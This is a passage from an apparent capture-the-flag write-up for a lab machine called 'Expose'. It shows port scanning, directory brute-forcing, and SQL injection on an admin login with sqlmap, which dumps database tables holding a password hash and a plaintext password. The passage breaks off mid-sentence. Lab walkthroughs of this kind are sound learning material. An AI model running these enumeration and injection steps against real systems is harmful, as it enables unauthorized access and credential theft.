# Expose Writeup This is an easy machine that teaches you enumeration and patience. ## Enumeration ```sh nmap -p- --min-rate 3000 10.10.45.72 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-03 14:25 CEST Nmap scan report for 10.10.45.72 Host is up (0.064s latency). Not shown: 65530 closed tcp ports (conn-refused) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 53/tcp open domain 1337/tcp open waste 1883/tcp open mqtt Nmap done: 1 IP address (1 host up) scanned in 23.94 seconds ``` ### FTP Taking a quick look at the ftp content yields and empty directory and no interesting information ```sh $ ftp anonymous@10.10.144.33 Connected to 10.10.144.33 220 Welcome to the Expose Web Challenge. 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||30302|) 150 Here comes the directory listing. drwxr-xr-x 2 0 121 4096 Jun 11 11:56 . drwxr-xr-x 2 0 121 4096 Jun 11 11:56 .. 226 Directory send OK. ftp> ``` ### MQTT Taking a look at the messages sent via mqtt topics through [MQTT-Explorer](https://github.com/thomasnordquist/MQTT-Explorer/releases) shows a bunch of metrics data. I'll ignore this for now. ### Web Next in line is web enumeration. Therefore, I'll use dirsearch. ```sh $ dirsearch -r -R 5 -u 10.10.144.33:1337 [00:43:20] Starting: [00:43:23] 403 - 279B - /.ht_wsr.txt [00:43:23] 403 - 279B - /.htaccess.bak1 [00:43:23] 403 - 279B - /.htaccess.sample [00:43:23] 403 - 279B - /.htaccess.orig [00:43:23] 403 - 279B - /.htaccess_orig [00:43:23] 403 - 279B - /.htaccess.save [00:43:23] 403 - 279B - /.htaccess_extra [00:43:23] 403 - 279B - /.htaccess_sc [00:43:23] 403 - 279B - /.htaccessOLD [00:43:23] 403 - 279B - /.htaccessOLD2 [00:43:23] 403 - 279B - /.htaccessBAK [00:43:23] 403 - 279B - /.html [00:43:23] 403 - 279B - /.htm [00:43:23] 403 - 279B - /.htpasswds [00:43:23] 403 - 279B - /.htpasswd_test [00:43:23] 403 - 279B - /.httr-oauth [00:43:24] 403 - 279B - /.php [00:43:32] 301 - 319B - /admin -> http://10.10.144.33:1337/admin/ (Added to queue) [00:43:33] 403 - 279B - /admin/.htaccess [00:43:33] 200 - 1KB - /admin/ [00:43:33] 200 - 1KB - /admin/?/login [00:43:33] 200 - 1KB - /admin/index.php [00:43:35] 301 - 323B - /admin_101 -> http://10.10.144.33:1337/admin_101/ (Added to queue) [00:43:53] 200 - 91B - /index.php [00:43:53] 200 - 91B - /index.php/login/ (Added to queue) [00:43:54] 301 - 324B - /javascript -> http://10.10.144.33:1337/javascript/ (Added to queue) [00:44:00] 200 - 15KB - /phpmyadmin/doc/html/index.html [00:44:01] 301 - 324B - /phpmyadmin -> http://10.10.144.33:1337/phpmyadmin/ [00:44:02] 200 - 14KB - /phpmyadmin/ [00:44:02] 200 - 14KB - /phpmyadmin/index.php [00:44:05] 403 - 279B - /server-status/ (Added to queue) [00:44:05] 403 - 279B - /server-status [00:44:14] Starting: admin/ [00:44:17] 403 - 279B - /admin/.ht_wsr.txt [00:44:17] 403 - 279B - /admin/.htaccess.orig [00:44:17] 403 - 279B - /admin/.htaccess.save [00:44:17] 403 - 279B - /admin/.htm [00:44:17] 403 - 279B - /admin/.html [00:44:17] 403 - 279B - /admin/.htpasswd_test [00:44:17] 403 - 279B - /admin/.htaccess_sc [00:44:17] 403 - 279B - /admin/.htpasswds [00:44:17] 403 - 279B - /admin/.htaccessOLD [00:44:17] 403 - 279B - /admin/.htaccessBAK [00:44:17] 403 - 279B - /admin/.htaccess_extra [00:44:17] 403 - 279B - /admin/.htaccess_orig [00:44:17] 403 - 279B - /admin/.htaccess.sample [00:44:17] 403 - 279B - /admin/.htaccessOLD2 [00:44:17] 403 - 279B - /admin/.httr-oauth [00:44:17] 403 - 279B - /admin/.htaccess.bak1 [00:44:18] 403 - 279B - /admin/.php [00:44:35] 301 - 326B - /admin/assets -> http://10.10.144.33:1337/admin/assets/ (Added to queue) [00:44:35] 200 - 2KB - /admin/assets/ [00:44:45] 200 - 1KB - /admin/index.php [00:44:45] 200 - 1KB - /admin/index.php/login/ (Added to queue) [00:44:48] 500 - 0B - /admin/logout.php [00:44:50] 301 - 327B - /admin/modules -> http://10.10.144.33:1337/admin/modules/ (Added to queue) [00:44:50] 200 - 1KB - /admin/modules/ [00:45:05] Starting: admin_101/ [00:45:08] 403 - 279B - /admin_101/.ht_wsr.txt [00:45:08] 403 - 279B - /admin_101/.htaccess.bak1 [00:45:08] 403 - 279B - /admin_101/.htaccess.orig [00:45:08] 403 - 279B - /admin_101/.htaccess.sample [00:45:08] 403 - 279B - /admin_101/.htaccessOLD2 [00:45:08] 403 - 279B - /admin_101/.htaccess.save [00:45:08] 403 - 279B - /admin_101/.htaccessBAK [00:45:08] 403 - 279B - /admin_101/.htaccess_extra [00:45:08] 403 - 279B - /admin_101/.htaccess_orig [00:45:08] 403 - 279B - /admin_101/.htaccess_sc [00:45:08] 403 - 279B - /admin_101/.html [00:45:09] 403 - 279B - /admin_101/.htm [00:45:09] 403 - 279B - /admin_101/.httr-oauth [00:45:09] 403 - 279B - /admin_101/.htpasswds [00:45:09] 403 - 279B - /admin_101/.htpasswd_test [00:45:09] 403 - 279B - /admin_101/.htaccessOLD [00:45:10] 403 - 279B - /admin_101/.php [00:45:25] 200 - 2KB - /admin_101/assets/ (Added to queue) [00:45:25] 301 - 330B - /admin_101/assets -> http://10.10.144.33:1337/admin_101/assets/ [00:45:28] 302 - 1KB - /admin_101/chat.php -> index [00:45:36] 301 - 332B - /admin_101/includes -> http://10.10.144.33:1337/admin_101/includes/ (Added to queue) [00:45:36] 200 - 1KB - /admin_101/includes/ [00:45:36] 200 - 2KB - /admin_101/index.php [00:45:36] 200 - 2KB - /admin_101/index.php/login/ (Added to queue) [00:45:39] 302 - 0B - /admin_101/logout.php -> login [00:45:41] 200 - 1KB - /admin_101/modules/ (Added to queue) [00:45:41] 301 - 331B - /admin_101/modules -> http://10.10.144.33:1337/admin_101/modules/ [00:45:49] 200 - 2KB - /admin_101/signup.php [00:45:52] 301 - 328B - /admin_101/test -> http://10.10.144.33:1337/admin_101/test/ (Added to queue) [00:45:52] 200 - 769B - /admin_101/test/ [00:46:04] Starting: index.php/login/ [00:46:56] Starting: javascript/ [00:46:59] 403 - 279B - /javascript/.htaccess.bak1 [00:46:59] 403 - 279B - /javascript/.ht_wsr.txt [00:46:59] 403 - 279B - /javascript/.htaccess.orig [00:46:59] 403 - 279B - /javascript/.htaccessOLD2 [00:46:59] 403 - 279B - /javascript/.htaccessBAK [00:46:59] 403 - 279B - /javascript/.htaccess_sc [00:46:59] 403 - 279B - /javascript/.htaccess_extra [00:46:59] 403 - 279B - /javascript/.htaccess.save [00:46:59] 403 - 279B - /javascript/.htaccess.sample [00:46:59] 403 - 279B - /javascript/.htaccessOLD [00:46:59] 403 - 279B - /javascript/.htaccess_orig [00:46:59] 403 - 279B - /javascript/.htpasswd_test [00:47:00] 403 - 279B - /javascript/.htpasswds [00:47:00] 403 - 279B - /javascript/.htm [00:47:00] 403 - 279B - /javascript/.httr-oauth [00:47:00] 403 - 279B - /javascript/.html [00:47:01] 403 - 279B - /javascript/.php [00:47:48] Starting: server-status/ [00:47:50] 404 - 276B - /server-status/%2e%2e//google.com [00:48:41] Starting: admin/assets/ [00:48:44] 403 - 279B - /admin/assets/.ht_wsr.txt [00:48:44] 403 - 279B - /admin/assets/.htaccess.bak1 [00:48:44] 403 - 279B - /admin/assets/.htaccess.orig [00:48:44] 403 - 279B - /admin/assets/.htaccess.save [00:48:44] 403 - 279B - /admin/assets/.htaccess.sample [00:48:44] 403 - 279B - /admin/assets/.htpasswds [00:48:44] 403 - 279B - /admin/assets/.httr-oauth [00:48:44] 403 - 279B - /admin/assets/.htaccessOLD [00:48:44] 403 - 279B - /admin/assets/.htaccess_extra [00:48:44] 403 - 279B - /admin/assets/.htaccess_orig [00:48:44] 403 - 279B - /admin/assets/.htaccessOLD2 [00:48:44] 403 - 279B - /admin/assets/.htaccessBAK [00:48:44] 403 - 279B - /admin/assets/.htaccess_sc [00:48:44] 403 - 279B - /admin/assets/.html [00:48:44] 403 - 279B - /admin/assets/.htm [00:48:44] 403 - 279B - /admin/assets/.htpasswd_test [00:48:46] 403 - 279B - /admin/assets/.php [00:49:36] Starting: admin/index.php/login/ [00:50:34] Starting: admin/modules/ [00:50:38] 403 - 279B - /admin/modules/.htaccess.bak1 [00:50:38] 403 - 279B - /admin/modules/.ht_wsr.txt [00:50:38] 403 - 279B - /admin/modules/.htaccess.sample [00:50:38] 403 - 279B - /admin/modules/.htaccess_extra [00:50:38] 403 - 279B - /admin/modules/.htaccess.orig [00:50:38] 403 - 279B - /admin/modules/.htaccess_sc [00:50:38] 403 - 279B - /admin/modules/.htaccessBAK [00:50:38] 403 - 279B - /admin/modules/.htaccess.save [00:50:38] 403 - 279B - /admin/modules/.htaccessOLD2 [00:50:38] 403 - 279B - /admin/modules/.htaccess_orig [00:50:38] 403 - 279B - /admin/modules/.htm [00:50:38] 403 - 279B - /admin/modules/.htaccessOLD [00:50:38] 403 - 279B - /admin/modules/.httr-oauth [00:50:38] 403 - 279B - /admin/modules/.htpasswd_test [00:50:38] 403 - 279B - /admin/modules/.htpasswds [00:50:38] 403 - 279B - /admin/modules/.html [00:50:39] 403 - 279B - /admin/modules/.php [00:51:04] 200 - 16B - /admin/modules/footer.php [00:51:05] 200 - 628B - /admin/modules/header.php [00:51:29] Starting: admin_101/assets/ [00:51:33] 403 - 279B - /admin_101/assets/.htaccess.orig [00:51:33] 403 - 279B - /admin_101/assets/.ht_wsr.txt [00:51:33] 403 - 279B - /admin_101/assets/.htaccess.sample [00:51:33] 403 - 279B - /admin_101/assets/.htaccess.save [00:51:33] 403 - 279B - /admin_101/assets/.htaccess_orig [00:51:33] 403 - 279B - /admin_101/assets/.htaccessOLD2 [00:51:33] 403 - 279B - /admin_101/assets/.htaccessBAK [00:51:33] 403 - 279B - /admin_101/assets/.html [00:51:33] 403 - 279B - /admin_101/assets/.htaccess_sc [00:51:33] 403 - 279B - /admin_101/assets/.htaccessOLD [00:51:33] 403 - 279B - /admin_101/assets/.htm [00:51:33] 403 - 279B - /admin_101/assets/.htaccess.bak1 [00:51:33] 403 - 279B - /admin_101/assets/.httr-oauth [00:51:33] 403 - 279B - /admin_101/assets/.htpasswds [00:51:33] 403 - 279B - /admin_101/assets/.htpasswd_test [00:51:33] 403 - 279B - /admin_101/assets/.htaccess_extra [00:51:34] 403 - 279B - /admin_101/assets/.php [00:52:23] Starting: admin_101/includes/ [00:52:27] 403 - 279B - /admin_101/includes/.htaccess.orig [00:52:27] 403 - 279B - /admin_101/includes/.htaccess.bak1 [00:52:27] 403 - 279B - /admin_101/includes/.htaccess.sample [00:52:27] 403 - 279B - /admin_101/includes/.htaccess.save [00:52:27] 403 - 279B - /admin_101/includes/.htaccessBAK [00:52:27] 403 - 279B - /admin_101/includes/.ht_wsr.txt [00:52:27] 403 - 279B - /admin_101/includes/.htaccess_orig [00:52:27] 403 - 279B - /admin_101/includes/.htm [00:52:27] 403 - 279B - /admin_101/includes/.htpasswd_test [00:52:27] 403 - 279B - /admin_101/includes/.htaccessOLD2 [00:52:27] 403 - 279B - /admin_101/includes/.htaccess_sc [00:52:27] 403 - 279B - /admin_101/includes/.htaccess_extra [00:52:27] 403 - 279B - /admin_101/includes/.htaccessOLD [00:52:27] 403 - 279B - /admin_101/includes/.htpasswds [00:52:27] 403 - 279B - /admin_101/includes/.httr-oauth [00:52:27] 403 - 279B - /admin_101/includes/.html [00:52:29] 403 - 279B - /admin_101/includes/.php [00:53:18] Starting: admin_101/index.php/login/ [00:54:19] Starting: admin_101/modules/ [00:54:23] 403 - 279B - /admin_101/modules/.ht_wsr.txt [00:54:23] 403 - 279B - /admin_101/modules/.htaccess.bak1 [00:54:23] 403 - 279B - /admin_101/modules/.htaccess.orig [00:54:23] 403 - 279B - /admin_101/modules/.htaccess.sample [00:54:23] 403 - 279B - /admin_101/modules/.htaccess_extra [00:54:23] 403 - 279B - /admin_101/modules/.htaccess_orig [00:54:23] 403 - 279B - /admin_101/modules/.htaccess.save [00:54:23] 403 - 279B - /admin_101/modules/.htaccessOLD2 [00:54:23] 403 - 279B - /admin_101/modules/.htaccessBAK [00:54:23] 403 - 279B - /admin_101/modules/.html [00:54:23] 403 - 279B - /admin_101/modules/.htpasswd_test [00:54:23] 403 - 279B - /admin_101/modules/.htaccess_sc [00:54:23] 403 - 279B - /admin_101/modules/.htaccessOLD [00:54:23] 403 - 279B - /admin_101/modules/.htm [00:54:23] 403 - 279B - /admin_101/modules/.htpasswds [00:54:23] 403 - 279B - /admin_101/modules/.httr-oauth [00:54:24] 403 - 279B - /admin_101/modules/.php [00:54:49] 200 - 16B - /admin_101/modules/footer.php [00:54:50] 500 - 0B - /admin_101/modules/header.php [00:55:13] Starting: admin_101/test/ [00:55:17] 403 - 279B - /admin_101/test/.ht_wsr.txt [00:55:17] 403 - 279B - /admin_101/test/.htaccess.orig [00:55:17] 403 - 279B - /admin_101/test/.htaccess.bak1 [00:55:17] 403 - 279B - /admin_101/test/.htaccess_extra [00:55:17] 403 - 279B - /admin_101/test/.htaccess.save [00:55:17] 403 - 279B - /admin_101/test/.htaccess.sample [00:55:17] 403 - 279B - /admin_101/test/.htaccess_sc [00:55:17] 403 - 279B - /admin_101/test/.htaccess_orig [00:55:17] 403 - 279B - /admin_101/test/.htaccessOLD [00:55:17] 403 - 279B - /admin_101/test/.htaccessBAK [00:55:17] 403 - 279B - /admin_101/test/.htaccessOLD2 [00:55:17] 403 - 279B - /admin_101/test/.htpasswd_test [00:55:17] 403 - 279B - /admin_101/test/.htm [00:55:17] 403 - 279B - /admin_101/test/.html [00:55:17] 403 - 279B - /admin_101/test/.htpasswds [00:55:17] 403 - 279B - /admin_101/test/.httr-oauth [00:55:18] 403 - 279B - /admin_101/test/.php ``` We can see two different administrational url paths. Visiting `admin_101` provides a login with a username prefilled. Catching the response of an unsuccessful login attempt via Burpsuite shows the SQL query in JSON format. Pretty clearly there is a possible SQL injection through the username/email parameter of the form. ```json { "status": "error", "messages": [ "SELECT * FROM user WHERE email = 'hacker@root.thm'" ] } ``` Using sqlmap on the file containing the stored POST request of the login provides us some passwords and paths stored in some database tables. ```sh sqlmap -r ./login.req --dump ``` ``` [...] Database: expose Table: config [2 entries] +----+------------------------------+-----------------------------------------------------+ | id | url | password | +----+------------------------------+-----------------------------------------------------+ | 1 | /file1010111/index.php | 69c66901194a6486176e81f5945b8929 | | 3 | /upload-cv00101011/index.php | // ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z | +----+------------------------------+-----------------------------------------------------+ [22:53:58] [INFO] table 'expose.config' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.144.33/dump/expose/config.csv' [22:53:58] [INFO] fetching columns for table 'user' in database 'expose' [22:53:58] [INFO] retrieved: 'id' [22:53:58] [INFO] retrieved: 'int' [22:53:58] [INFO] retrieved: 'email' [22:53:58] [INFO] retrieved: 'varchar(512)' [22:53:58] [INFO] retrieved: 'password' [22:53:59] [INFO] retrieved: 'varchar(512)' [22:53:59] [INFO] retrieved: 'created' [22:53:59] [INFO] retrieved: 'timestamp' [22:53:59] [INFO] fetching entries for table 'user' in database 'expose' [22:53:59] [INFO] retrieved: '2023-02-21 09:05:46' [22:53:59] [INFO] retrieved: 'hacker@root.thm' [22:53:59] [INFO] retrieved: '1' [22:53:59] [INFO] retrieved: 'VeryDifficultPassword!!#@#@!#!@#1231' Database: expose Table: user [1 entry] +----+-----------------+---------------------+--------------------------------------+ | id | email | created | password | +----+-----------------+---------------------+--------------------------------------+ | 1 | hacker@root.thm | 2023-02-21 09:05:46 | VeryDifficultPassword!!#@#@!#!@#1231 | +----+-----------------+---------------------+--------------------------------------+ [...] ``` [Crackstation](https://crackstation.net) is able to solve the password hash of id 1 in no time. After